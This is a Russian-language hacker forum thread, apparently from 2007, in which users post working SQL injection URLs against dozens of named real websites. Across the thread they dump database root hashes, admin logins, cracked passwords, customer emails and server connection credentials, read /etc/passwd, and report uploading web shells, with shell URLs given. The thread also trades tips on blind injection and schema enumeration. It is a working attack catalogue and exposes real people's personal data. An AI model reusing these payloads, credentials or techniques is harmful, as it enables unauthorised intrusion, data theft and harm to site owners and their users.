доступ к information_schema

------------------------------------------------------------------

http://www.vremea.net/index.php?content=news&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5/*

4.0.27-standard/vremea_vremea/vremea@localhost
------------------------------------------------------------------

na-dosuge.dp.ua

http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,version(),database() ,user())/*

5.0.27/price/dprice@localhost

http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,name,pass,email)+fro m+_rat+limit+0,1/*

имя/пароль/мейл
prod/2503919/beliu_impex@mail.ru

http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,customers_firstname, customers_password)+from+customers+limit+3,1/*

имя\хеш с солью

А это их казино

http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,login,pass,wm)+from+ casino_uwed+limit+0,1/*

логин/пароль/WebMoney наверно кошелек

http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,login,pass,wm)+from+ casino_wm+limit+1,1/*

Эти таблицы пустые ))) (за исключением тестовых юзверей). Сайт сырой и казино будет попозже )

fRg

06.11.2007, 09:53

vsekiden.com - похоже на БТА - Болгарское Телевизионное Агенствоhttp://www.vsekiden.com/news.php?topic=3&id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10/*5.0.32-Debian_7etch1-log:vsekiden:vsekiden@localhost

81 таблица:http://www.vsekiden.com/news.php?topic=3&id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+ information_schema.tables+limit+80,1/*root:http://www.vsekiden.com/news.php?topic=3&id=-1+union+select+1,concat_ws(0x3a,User,Password),3,4 ,5,6,7,8,9,10+from+mysql.user/*root:*CCBD21CD8E1C871D9C7F996760C867CC31F4830F

Интересные табы:

newvd_users,
cgp133_users,
cgp133_ecards

fRg

06.11.2007, 14:37

www.weltexpress.infohttp://www.weltexpress.info/index.php?artikel_id=64444&lan=ru&rubrik=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*5.0.24-DEBIAN_3-LOG:WELTEXPRESS:WELTEXPRESS@LOCALHOST

35 таблиц:http://www.weltexpress.info/index.php?artikel_id=64444&lan=ru&rubrik=-1+union+select+table_name+from+information_schema. tables+limit+34,1/*Нашёл таблицу USER, посмотрел её схему: PHILBERL-1.USER и WELTEXPRESS.USER
Есть поля USER и PWD, но данные вывести не получилось... Требуется подсказка.
Ещё есть таблицы C_USERS и KALASCHNIKOW. В последней из них есть любопытные поля:
UNIXDATA, PASSWORD, BN_NAME...
Но с выводом данных - проблема. :mad:

groundhog

06.11.2007, 14:47

Проблема от того, что бажная пага коннектится от юзера Weltexpress, а найденные тобой табы принадлежат другим юзерам... Вот и не получается организовать вывод, т.к. в схеме твоего пользователя этих таб нету.

groundhog

06.11.2007, 16:48

fRg, вот смотри - при инъекции иногда полезно бывает просматривать поле table_schema, чтобы видеть в какой схеме находится интересующая нас таблица, иначе, как в твоём случае, есть шанс, что текущему пользователю не хватит прав на доступ к ней. Вот пример:

http://www.weltexpress.info/index.php?artikel_id=64444&lan=ru&rubrik=-1+union+select+concat_ws(0x3a,user(),table_schema, table_name)+from+information_schema.tables+limit+3 4,1/*
Он выводит:

WELTEXPRESS@LOCALHOST:PHILBERL-1:WISSENSCHAFT_KALASCHNIKOW
Легко убедиться, что наш юзер это WELTEXPRESS, а таблица WISSENSCHAFT_KALASCHNIKOW находится в схеме пользователя PHILBERL-1.

nikoTM

06.11.2007, 17:02

http://goldenmask.ru/news.php?nid=-1+union+select+1,2,3,4,5,6+news_admin/*

не смог найти имена колонок)

l-l00K

06.11.2007, 18:34

http://goldenmask.ru/news.php?nid=-1+union+select+1,2,3,4,5,6+news_admin/*
там таблицы такой нет, ты from забыл

lib.uci.edu
http://www.lib.uci.edu/partners/index.php?page=eresearch
в поле Premium access:
Partner ID') OR 1=(SELECT TOP 1 PASSWORD FROM USERS)--
SYSTEM_USER: PartnersPublic
DB_NAME: partners
version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

User: PartnersPublic
hash:fd6df34ee4e7642c02ced6012028f6b8

KEHT33

06.11.2007, 20:57

не смог найти имена колонок)

Там только таблица forum есть с полями (data, id,ip,mail) больше не нашёл

Scipio

06.11.2007, 21:09

Там только таблица forum есть с полями (data, id,ip,mail) больше не нашёл

Плохо искал:
http://goldenmask.ru/news.php?nid=-1+union+select+1,2,3,concat(login,0x3a,password),5 ,6%20from%20gm_users/*

KEHT33

06.11.2007, 22:28

http://losev-library.ru/index.php?pid=-3271+UNION+SELECT+1,concat(user,0x3b,password)+fro m+mysql.user+limit+1,3/*
БД скул >5

сори поправочка

http://losev-library.ru/index.php?pid=-3271+UNION+SELECT+1,concat(us_id,0x3a,us_name,0x3a ,us_pass,0x3a,us_perm,0x3a,us_descr)+from+us/*

админка
http://losev-library.ru/nav/index.php?pid=64

залил шелл порыл дальше вообще прикол... практически везде фулл доступ....хоть папку виндоус стирай......

KEHT33

07.11.2007, 02:34

известный мобильный ресурс amobile.ru
http://www.amobile.ru/news/news.php?nid=1880%20union%20select%201,2,3,4+from+ news/*
сдесь не нашёл никакой таблицы кроме news :( может кто ещё что нить увидит

далее все ресурсы этого портала.

Портал мобильных развлечений
http://www.funs.ru/news/news.php?nid=-100%20union%20select%201,2,concat(user,0x3a,passwo rd),4+from+mysql.user/*

Новости цифровой фотографии
http://www.aphoto.ru/news/news.php?nid=-23%20union%20select%201,2,3,4/*

если админа подберём мона нахаляву покачать )

fRg

07.11.2007, 09:52

rbcob.ru - Региональная Баннерная Сеть "Омский Баннер"http://www.rbcob.ru/news_body.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6/*4.0.27-standard:globalom_ob:globalom_ob@localhost
rabotaomsk.ru - работа в Омскеhttp://www.rabotaomsk.ru/firmnews/news_body.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23/*4.0.27-standard : omck_firmnews : omck_firmnews@localhost
business.su - Деловой портал СНГhttp://www.business.su/kat.php?goroda=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user()),8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50/*4.0.27-standard : omck_firmnews : omck_firmnews@localhost
До таблиц пока не докопался...

ЛифчиС5СВ

07.11.2007, 12:37

Гыгы. заюзал сплоит Don Dork'a
Links MOD v1.2.2 PHPBB

Хешики тут:
http://www.cats-house.com/links.php?t=search&search_keywords=asd&start=1+UNION+SELECT+1,username,user_password,4,5, 6,7,8,9,10,11,12+FROM+phpbb_users/*

fRg

07.11.2007, 14:35

fondsk.ru - Фонд Стратегической Культурыhttp://fondsk.ru/articlelist.php?section_id=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*4.0.26-log:u32888:u32888@10.10.223.204

yaleherald.comhttp://www.yaleherald.com/section.php?Section=2&Issue=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*4.1.22-standard:yherald_com:yherald@localhost

Joker-jar

07.11.2007, 15:18

http://blog.pmaster.net/post.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11/*
http://blog.pmaster.net/post.php?id=-1+union+select+1,char(0x3c,0x73,0x63,0x72,0x69,0x7 0,0x74,0x3e,0x61,0x6c,0x65,0x72,0x74,0x28,0x27,0x4 1,0x4e,0x54,0x49,0x43,0x48,0x41,0x54,0x27,0x29,0x3 c,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x3e),3,4,5,6 ,7,8,9,10,11/*

nikoTM

07.11.2007, 15:27

там таблицы такой нет, ты from забыл

Блин как стыдно :o не думал что могу сделать такую ошибку )

0nep@t0p

07.11.2007, 17:14

http://www.level.ru/ - Интернет магазин "Левел"
http://www.level.ru/index.php?flt=7&folder=2689&fold=11776&fld=-22912)+union+select+1,2,concat(user,0x3a,password) ,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
Версия: 4.0.18
Юзер: root@localhost
Mysql users
root:27ad7c3446c9d3dd
root:7e9607db022e3f71
freenibs:565491d704013245
for_shop_2:4ccee85a3015e2d6
Dimano:320c67895c24eb79

Админы - http://www.level.ru/index.php?flt=7&folder=2689&fold=11776&fld=-22912)+union+select+1,2,concat(login,0x3a,pass),4, 5,6,7,8,9,10,11,12,13,14,15+from+users/*
Админка (как ни странно) - http://www.level.ru/admin
Логин: user
Пасс: user

Юзеры - http://www.level.ru/index.php?flt=7&folder=2689&fold=11776&fld=-22912)+union+select+1,2,concat(login,0x3a,pass),4, 5,6,7,8,9,10,11,12,13,14,15+from+clients/*

http://forum.hustleclub.ru/
На форуме стоит Инвиж, в котором присутствует древняя бага -
http://forum.hustleclub.ru/index.php?act=Post&CODE=02&f=42&t=728&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1 ,1,1,CONCAT(id,char(58),name,char(58),member_login _key),1,1,1,1,1,1,1,1,1%20from%20ibf_members%20whe re%20id=1/*
Версия: 5.0.45-log
Юзверь: u8013@10.10.223.236

IPB Admin:
Login: Ajrat
Hash: 5fd53bdc4d50e4ffbf65dfc39ff93935
Через подмену куков становимся админами
p.s. Скулю может использовать только зареганный юзверь

Аналогично -
http://www.oskexpert.ru/
http://www.oskexpert.ru/forum/index.php?&act=Post&CODE=02&f=2&t=598&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1 ,1,1,CONCAT(id,char(58),name,char(58),member_login _key),1,1,1,1,1,1,1,1,1%20from%20ibf_members%20WHE RE%20id=1%20/*

Версия: 4.1.21-log
Юзверь: Uwww3191S@localhost

IPB Admin:
Login: admin
Hash: ff6f02484f67bc7990c6bd2eee3f415c

KEHT33

07.11.2007, 19:27

сайт мобильных телефонов http://www.interstar.ua/

http://www.interstar.ua/mobile/?day_begin=08&mounth_begin=10&year_begin=2007&day_end=07&mounth_end=11&year_end=2007&main_menu=5&id_show=-5403%20union%20select%20login,2,3,4,5,password,7,8 +from+users+limit+0,1/*
Другая таблица

http://www.interstar.ua/mobile/?day_begin=08&mounth_begin=10&year_begin=2007&day_end=07&mounth_end=11&year_end=2007&main_menu=5&id_show=-5403%20union%20select%20login_member,2,3,4,5,conca t(password_member,0x3b,email_member),7,8+from+memb ers+limit+1,1/*

fRg

07.11.2007, 21:21

aim-mia.de http://www.aim-mia.de/categories.php?catid=-1+union+select+concat(aes_decrypt(aes_encrypt(vers ion(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(dat abase(),0x71),0x71)),aes_decrypt(aes_encrypt(user( ),0x71),0x71)/* 85 таблиц:http://www.aim-mia.de/categories.php?catid=-1+union+select+aes_decrypt(aes_encrypt(table_name, 0x71),0x71),2+from+information_schema.tables+limit +84,1/* root:http://www.aim-mia.de/categories.php?catid=-1+union+select+aes_decrypt(aes_encrypt(USER,0x71), 0x71),aes_decrypt(aes_encrypt(PASSWORD,0x71),0x71) +from+MYSQL.USER+limit+0,1/* ROOT:*980166F60E2FA650E7930113CDCA43D3BA726973
Интересные таблицы: JOS_USERS и ADMINBLOCK (есть и другие...)

l-l00K

08.11.2007, 00:37

logobook.ru
http://www.logobook.ru/prod_show.php?object_uid=11122009%20or%201=(select %20db_name())--
version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
system_user: sa
db_name: Images

emigranty.ru
http://www.emigranty.ru/letters.php?lid=-38+union+select+1,2,concat_ws(char(58),version(),u ser(),database())+--+
5.0.22-Debian_0ubuntu6.06.5-log:emigrantyr@uvirt4.active24.cz:emigrantyr

/etc/passwd
http://www.emigranty.ru/letters.php?lid=-38+union+select+1,LOAD_FILE(char(47,101,116,99,47, 112,97,115,115,119,100)),concat_ws(char(58),versio n(),user(),database())+--+

http://www.emigranty.ru/letters.php?lid=-38+union+select+1,2,concat_ws(char(58),uLogin,uPas s)+from+emg_user+--+
login: rdm
password: rdm
http://www.emigranty.ru/admin/

Spyder

08.11.2007, 01:17

Решил выложить в паблик
RAP.ru
http://www.rap.ru/_Includes/redirect.php?banner_id=-204+union+select+1,2,3,4,5,version(),7/*
5.0.30-Debian_3-log
Cоответственно информ шема и таблица Admins
Поля Nick и Passwd
Administrator:bf7b9529faef3cf1cb6f56dca50c86df:dtc yfktnj
finger:d47e7c43b07bfbe06be1f88acb48d482
есть админка на rap.ru/admin - но там бейсик авторизация по .htpasswd
На форуме не получается залогинится под одним из админов, так же нет доступа к бд форума через инъект
ЗЫ Там же на сайте, в поиске XSS =)
Админы не закроют багу до поднятия шела, ибо им пофек =)

FoxMALDER

08.11.2007, 01:30

Сильно не пинайте... Первый вклад :)

SQL-Inj... :)
http://asamsu.ru/asamsu.php?id=-1+union+select+0,1,concat(version(),char(58),user( ),char(58),database()),3/*
Нарыл таблицы...
asa_news, asa_partners, asa_foto, asa_video, asa_dance, asa_materials, asa_pres, asa_price
Копаю дальше. Вот ошибка и база к форуму...
http://www.asamsu.ru/forum/index.php?showtopic=978&st=-1
А дальше, дело техники...
http://asamsu.ru/asamsu.php?id=-1+union+select+0,1,concat(converge_id,char(58),con verge_email,char(58),converge_joined,char(58),conv erge_pass_hash,char(58),converge_pass_salt),3+from +asamsu_forum.forum_members_converge+where+converg e_id=1/*

P.S.: Немного колдовства над паролем админа и шелл залит...http://www.asamsu.ru/img/news/av-2919.php

Dr.Z3r0

08.11.2007, 01:38

http://www.aldenvet.kiev.ua/news/viewnews.php?kley=-1478 UNION SELECT1,2,VERSION(),4,5,6,7
4 версия
Ничего интерсного случайно наткнулся... Если кому интересно рядом стоит форум phpbb ;)

L0rd_Ha0S

08.11.2007, 02:46

http://www.wiredforhealth.gov.uk/cat.php?catid=-1+union+select+1,2,3/*
http://www.wiredforhealth.gov.uk/search.php?catid=-1+union+select+1,2,3/*
http://www.wiredforhealth.gov.uk/feedback.php?catid=-1+union+select+1,2,3/*
Теперь самое интересное.

Blind SQL-injecting
http://www.wiredforhealth.gov.uk/cat.php?catid=857+and+ascii(lower(substring((selec t+password+from+mysql.user+where+user='root'+limit +1),1,1)))<110

database_name = webstructure
user = root@localhost
version = 4.1.0-alpha-loh
root:758a0e1c73f5e6fa:garand01
host = % - разрешено с любого хоста

Предположительно, сервер работает под SunOS.
Работает LOAD_FILE().
Уже несколько месяцев прошло, админ до сих пор не прикрыл баги (вероятно, ему пофигу), поэтому и выкладываю.

Sokoloff

08.11.2007, 03:17

delete please

FoxMALDER

08.11.2007, 03:43

torpal.com.ua - торговое оборудование
Версия: 5.0.27
Пользователь: torpal@localhost
http://www.torpal.com.ua/faq/?pm=-1+union+select+1,2,3,4,5,6,7,8,concat(version(),ch ar(58),user(),char(58),database()),10,11,12/*

Login: admin
Password: torpal_1506
http://www.torpal.com.ua/faq/?pm=-1+union+select+1,2,3,4,5,6,7,8,concat(login,char(5 8),password),10,11,12+from+t_users/*

P.S.: Админку не нашел :(

FoxMALDER

08.11.2007, 04:44

ctk.kiev.ua - центральные театральные кассы
Версия: 4.0.27-standard-log
Пользователь: ctk_admin@localhost
http://www.ctk.kiev.ua/?area_id=2&id=-1+union+select+1,2,3,4,5,6,concat(version(),char(5 8),user(),char(58),database()),8,9,10,11,12,13,14, 15,16,17,18,19/*
Надыбал таблицу 'categories':
http://www.ctk.kiev.ua/?area_id=2&id=-1+union+select+1,2,3,4,5,6,concat(id,char(58),name ),8,9,10,11,12,13,14,15,16,17,18,19+from+categorie s/*
Собственно рядом phpBB в нокауте лежит :)
Admin:61630e9cf1332bc73777a4238cc6fdfa:ctk@inet.ua
http://www.ctk.kiev.ua/?area_id=2&id=-1+union+select+1,2,3,4,5,6,concat(username,char(58 ),user_password,char(58),user_email),8,9,10,11,12, 13,14,15,16,17,18,19+from+phpbb_users+where+user_l evel=1/*

P.S.: У кого есть интерес глубже копать - делитесь плодами...

Mobile

08.11.2007, 05:47

Sokoloff выложи ссылку на "интересное место"

fRg

08.11.2007, 10:12

ildeposito.orghttp://www.ildeposito.org/view.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user())/* 108 таблиц:http://www.ildeposito.org/view.php?id=-1+union+select+1,2,3,table_name+from+information_s chema.tables+limit+107,1/* root:http://www.ildeposito.org/view.php?id=-1+union+select+1,2,3,concat_ws(0x3a,User,Password) +from+mysql.user/* root:*8C9EAD7FBDD7E16892FA0D3088DB9E47FAB3FCD3

Интересные таблицы: jos_users, wp_users и др.

israelbasket.com - Израильский Баскетболhttp://www.israelbasket.com/clubs.php?club=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13/* 4.1.22-standard-log:israelfo_israelfootball:israelfo@localhost
с табами - запарка... :mad:

_Pantera_

08.11.2007, 10:41

_http://www.tonnel.ru
mysql - 5 версии, всего в базе присутствует 133 таблицы
Ковычки не фильтруются, НО прав на чтение-запись нету!(
http://www.tonnel.ru/?l=gzl&uid=-509'+union+select+1,2,3,concat(table_schema,char(5 8),table_NAME),5,6,7,8,9,10,11,12,13+from+INFORMAT ION_SCHEMA.tables+limit+x,1/*
вот таблица приглянулась - digest_user
http://www.tonnel.ru/?l=gzl&uid=-509'+union+select+1,2,3,concat(name,char(58),email ,char(58),passwd),5,6,7,8,9,10,11,12,13+from+savin ov.digest_user+limit+0,1/*
Максим:admin@tonnel.ru:43957
и - music_user
http://www.tonnel.ru/?l=gzl&uid=-509'+union+select+1,2,3,concat(username,char(58),e mail,char(58),passwd),5,6,7,8,9,10,11,12,13+from+s avinov.music_user+limit+0,1/*
Максим:admin@tonnel.ru:vermax (под этим логином-паролем можно зайти на форум _http://www.tonnel.ru/board/)

fRg

08.11.2007, 11:02

Неожиданно наткнулся ...
lemon64.com - прикольный портальчикhttp://www.lemon64.com/?mainurl=http%3A//www.lemon64.com/reviews/view.php%3Fid%3D-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8/*
Таблица forum_users:
логин, пасс, уровень, мыло, ася, сайт, aim, yim, msnm, occhttp://www.lemon64.com/?mainurl=http%3A//www.lemon64.com/reviews/view.php%3Fid%3D-1+union+select+1,concat_ws(0x3a,username,user_pass word,user_level,user_email,user_icq,user_website,u ser_aim,user_yim,user_msnm,user_occ),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18+from+forum_users+limit +1,1/* Админ:
Kim Lemon:5967da78a21bd240b87d53bf568e7558

Elvis000

08.11.2007, 12:31

www.ziegler-film.com

http://www.ziegler-film.com/de/et/prod.html?lang=EN&ID=9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42/*

ver: 4.0.24_Debian-10sarge2-log
user: fml@localhost
base: ziegler

прав на чтение mysql.user нет.

v1ru$

08.11.2007, 14:33

http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(user(),0x3a,database (),0x3a,version()),5,6,7,8/*
5.1.11-beta

http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(password,0x3a,user), 5,6,7,8+from+mysql.user/*

root:*E372920927493C3BCEA6654A14218A59970A3D11:gfh jkm

Юзеры(пароли в чистом виде)

http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(name,0x3a,passw,0x3a ,email,0x3a),5,6,7,8+from+ph_user+limit+700,1/*

thx to F!$T

Nea7

08.11.2007, 14:53

http://www.fnazca.com.br/news/news.php?id_news=-1+union+select+aes_decrypt(aes_encrypt(version(),0 x71),0x71),2,3,4,5,6,7,8/*4.1.12-standard-log root:*542F4346222B98A7FB425DC2F817BEBE84DD56AAhttp ://www.poloarqdec.com.br/index.php?id=noticias&id_news=-1+union+select+1,2,3,version()/*4.0.18'-Max'-loghttp://www.somov.com.br/news_ler.php?id_news=-1+union+select+1,version(),user(),4,5,6,7,8/*5.0.41--log somov@200.234.200.49http://www.somov.com.br/news_ler.php?id_news=-1+union+select+1,concat(login,0x3a,senha),3,4,5,6, 7,8+from+cad_administrador+limit+0,1/*andre:mestre usadas:somov fernanda:somovfe ' or 1=1/*:123http://www.polmozbyt.krakow.pl/index.php?m=ss&id_ma=1&id_mo=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26/*4.1.20-loghttp://www.fsb-ae.com/projects/detail.php?id=-1+union+select+1,2,user(),version(),5,6,7,8,9,10,1 1,12/*&type=Landmarksfrankf4_fsbae@localhost 4.0.25-standardhttp://www.fsb-ae.com/projects/detail.php?id=-1+union+select+1,2,3,concat(name,0x3a,password,0x3 a,email),5,6,7,8,9,10,11,12+from+users/*&type=LandmarksVisual Inventor:06a80fec34e9262b:support@visualinventor.c om итд http://ims.edu.in/course_details.aspx?id=1+or+1=@@version--'Microsoft SQL Server 2000http://ims.edu.in/course_details.aspx?id=1%20or%201=(select+top+1+ca st(admin_id+as+nvarchar)%2B%27%3A%27%2Bcast(admin_ name+as+nvarchar)%2B%27%3A%27%2Bcast(admin_pasword +as+nvarchar)%20from%20tblAdminLogin)--'1:admin:admin'

fRg

08.11.2007, 15:29

dukemednews.orghttp://dukemednews.org/gallery/detail.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5/* 4.0.18:news:web@vml-news.duhs.duke.edu

root:http://dukemednews.org/gallery/detail.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4 ,5+from+mysql.user/* root:623460e26f081bbc

F!$T

08.11.2007, 16:38

Scipio

08.11.2007, 17:27

http://www.fcdynamo.ru/material.php?id=-651'+union+select+1,concat(login,0x3a,pass),3,4,5, 6,7,8+from+users/*
это для фанатов Динам0!
а вот что дальше делать я не понимаю... колонки login pass пустые :(

Это походу не использующаяся табличка

вот нашел:
http://www.fcdynamo.ru/material.php?id=-651'+union+select+1,concat(login,0x3a,password),3, 4,5,6,7,8+from+ut_users/*

KEHT33

08.11.2007, 19:22

Мобильные аксесуары
http://era.in.ua/line3.php?lng=ru&art=-217%20union%20select%201,2,concat(user_login,0x3b, user_passw),4,5,6,7+from+auth_users/*
Скул 5

l-l00K

08.11.2007, 23:45

trouserpress.com
http://www.trouserpress.com/entry.php?a=8romeo_void'+union+select+1,concat_ws( char(58),version(),user(),database()),3,4+--+&tr=y

4.1.22-standard:trouserp@localhost:trouserp_trouser

hitkaraoke.com
http://www.hitkaraoke.com/category_search.asp?CATID=186+or+1=(SELECT+TOP+1+T ABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db: HIT
user: hitusr1

AdminLogin:
login:dink911
password:sp0ng3b0b

Customers:
Email:dink911@yahoo.com
Password: dink

Админку не нашел

phol1eadeux

09.11.2007, 00:39

Сеть мебельных центров <<Грэйт>>
http://www.greatmebel.ru/products/?cat=SQL_INJ
Версия БД - 5.0.45
Админка:
/admin/
Логин: Dimon
Пароль: 11111

Логин: Kostan
Пароль: 99bd7225e7b5f895a36b5833342a3756 (MD5)

KEHT33

09.11.2007, 00:59

http://www.trubka.ru/cellular/phone.php?id=-1072+UNION+SELECT+1,2,concat(login,0x3b,pass),4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33+from+login/*
ДБ 4
нашёл 3 базы admin,news,login

http://mobila.gipershop.net.ua/descript.php?kodmob=493+UNION+SELECT+1,2,3,4,5,6,7 ,8,9,10,11/*
ДБ 4...чёта таблиц не нашёл

Red_Red1

09.11.2007, 02:28

http://www.sreda-mag.ru/faq_one.phtml?id=-680+union+select+1,2,3,4,5,6,id,8,9,10,11,12,13,14 ,15,concat(login,CHAR(58),parol),17,18+from+prepod s+where+id=18/*

Нужно перебирать id.

http://www.sreda-mag.ru/faq_one.phtml?id=-680+union+select+1,2,3,4,5,6,id,8,9,10,11,12,13,14 ,15,concat(login,CHAR(58),parol),17,18+from+prepod s+where+login<>CHAR(32)+and+login<>CHAR(107,114,97,118,99,104,101,110,107,111)+and+lo gin<>CHAR(100,97,114,105,97)/*

Можно еще таким извратом делать :)
Одно но..... пробую входить под получеными данными - нифига не получается, может кто додумает как и что...

Constantine

09.11.2007, 03:20

http://www.laptopshowcase.co.uk/downloads.php?id=1
Подобирать столбцы необходимо с помошью group+by

Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

В итоге правельным будет следующий запрос

_http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+10+union+select+1,2,version(),4,5,6,7,8 ,9,0,11/*

fRg

09.11.2007, 08:27

italia.allaboutjazz.com http://italia.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat_ws(0x3a,version(),database( ),user()),22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 ,69,70/* 4.1.20:italy:vxweb@www.allaboutjazz.com
доступ к mysql.user закрыт

fRg

09.11.2007, 13:11

media.uoa.grhttp://www.media.uoa.gr/yasmin/viewtopic.php?t=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14/* 4.0.21:yasmin:nobody@localhost

root:http://www.media.uoa.gr/yasmin/viewtopic.php?t=-1+union+select+1,2,concat_ws(0x3a,user,password),4 ,5,6,7,8,9,10,11,12,13,14+from+mysql.user/* root:13a2d19842b1bd5c

fRg

09.11.2007, 15:26

medizin-controller.dehttp://www.medizin-controller.de/news.php?id_news=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5/* 5.0.32-Debian_7etch1~bpo.1-log:medizincontroller_de:ftp25366@hydrogen.webpack .hosteurope.de

56 таблиц:http://www.medizin-controller.de/news.php?id_news=-1+union+select+1,table_name,3,4,5+from+information _schema.tables+limit+55,1/* залил два shell-a:http://www.medizin-controller.de/archiv/sh.php http://www.medizin-controller.de/archiv/rsh.phpданные из connect.php:

$server = "mysql5.webpack.hosteurope.de";
$user = "ftp25366";
$pass = "avatar";
$db = "medizincontroller_de";

-Hormold-

09.11.2007, 16:03

http://www.energyfm.ru/?an=nrj_scroll2'&nostat='

Если кто подберёт, скинте.

104.2 fm в МСК.

big_BRAT

09.11.2007, 17:14

Если кто подберёт, скинте.

104.2 fm в МСК.

зачем?
можешь почитать оч. старое сообщение ZaCo /https://antichat.ru/printthread.php?t=10601&pp=40/, эту дурку ещё не прикрыли, там по памяти он даже видео снял.

вот тебе для проверки http://www.energyfm.ru/?an=foto_slu&condition=czIgbGlrZSAnbm9fbmFtZScgdW5pb24gc2VsZWN0 IDEsMix2ZXJzaW9uKCksNCw1LDYsNyw4LDksMCwxLDIsMyw0LD UsNiw3LDgsOSwwLDEsMiwzLDQsNSw2LDcsOCw5

Scipio

09.11.2007, 18:10

www.maika.by

вот сама скуля:

http://www.maika.by/index.php?path=products&id=-45%20union%20select%201,2,3,4,5,6,7,8,9,10/*

мускул 5 ветки, file_priv нет, доступа к mysql.user тоже нет, ковычки фильтруются

но интересно другое, эта скуля позволяет инклюдить файлы например:
http://www.maika.by/index.php?path=products&id=-45%20union%20select%201,2,3,4,0x2F6574632F70617373 7764,6,7,8,9,10/*

инклюдит /etc/passwd, данные из 5 колонки в чистом виде передаются в функцию main()

Скорее всего возможен инклюд, не только локальных файлов, но у меня неполучилось это проверить, (слишком долго связывается с народом)

на серве есть еще несколько сайтов подобной тематики

Scipio

09.11.2007, 20:41

XAKEP.RU

Гыыы скуля на ксакепе

http://www.xakep.ru/articles/Links/result.asp?tosearch=theme=1+or+1=@@version

кстати я там скули 3-4 нашел, но они не особо перспективные

Dr.Z3r0

09.11.2007, 22:39

http://www.spmi.ru/index.php?id=6&t=show_news&nid='&lang=1
хз че это, но по моему то, что надо.
вот оно же но более раскрученно ;)
http://www.spmi.ru/index.php?id=6&t=show_news&nid=1' UNION SELECT '1',VERSION(),3 WHERE 1=1--

Holokost

09.11.2007, 22:42

http://www.spmi.ru/index.php?t=skeleton'&id=3&lang=1
там же

-MoLoToK-

09.11.2007, 22:45

Megashara

http://megashara.com/item.php?tid=-1'%20union%20select%201,2,3,4,5,6,7,8,user,10,11,1 2,13,14,15,16,17,18,19,20,21,22,password,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38%20from%20mysql .user/*
Таблица mysql.user Доступна
root:*111921C1B9EE2D4BD4C825031689DCD63239883F
После расшифровки root: ghjcnjgfhjkm

Админку не нашёл.
З.Ы странно после нахождения скули сайт глючить стал

Holokost

09.11.2007, 22:56

http://www.spmi.ru/index.php?id=6&t=show_news&nid=1'%20UNION%20SELECT%20null,user,null%20WHERE%2 01=1--
Че дальше можно наворотить?

Dr.Z3r0

09.11.2007, 23:02

http://www.spmi.ru/index.php?id=6&t=show_news&nid=1'%20UNION%20SELECT%20null,user,null%20WHERE%2 01=1--
Че дальше можно наворотить?
Там кажецо PostgreSQL читай ФАКи :)
